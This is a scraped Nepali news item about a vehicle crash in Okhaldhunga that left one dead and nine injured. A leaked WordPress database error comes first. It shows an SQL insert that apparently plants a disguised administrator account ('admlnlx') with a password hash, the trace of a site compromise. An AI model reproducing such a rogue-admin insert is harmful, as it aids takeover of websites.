WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B25qV6ye2wCOvcEnwB1FIMLOdzgDsQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 04:51:13', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । ओखलढुङगाबाट काठमाडौका लागी छुटेको गाडी दुर्घटना हुदा एकजनाको मृत्यु र ९ जना घाईते भएका छन् । आज बिहान १२ बजे मानेभञ्जाङ गाउँपालिका ६ हिलेपानीमा दुर्घटना भएको हो ।
मानेभज्याङ गाउँपालिका १ मोलीबाट काठमाडौका लागी छुटेको बा ११ च ५२१० नम्बरको टाटा सफारी दुर्घटनामा परेको ओखलढुङगा प्रहरीले जनाएको छ ।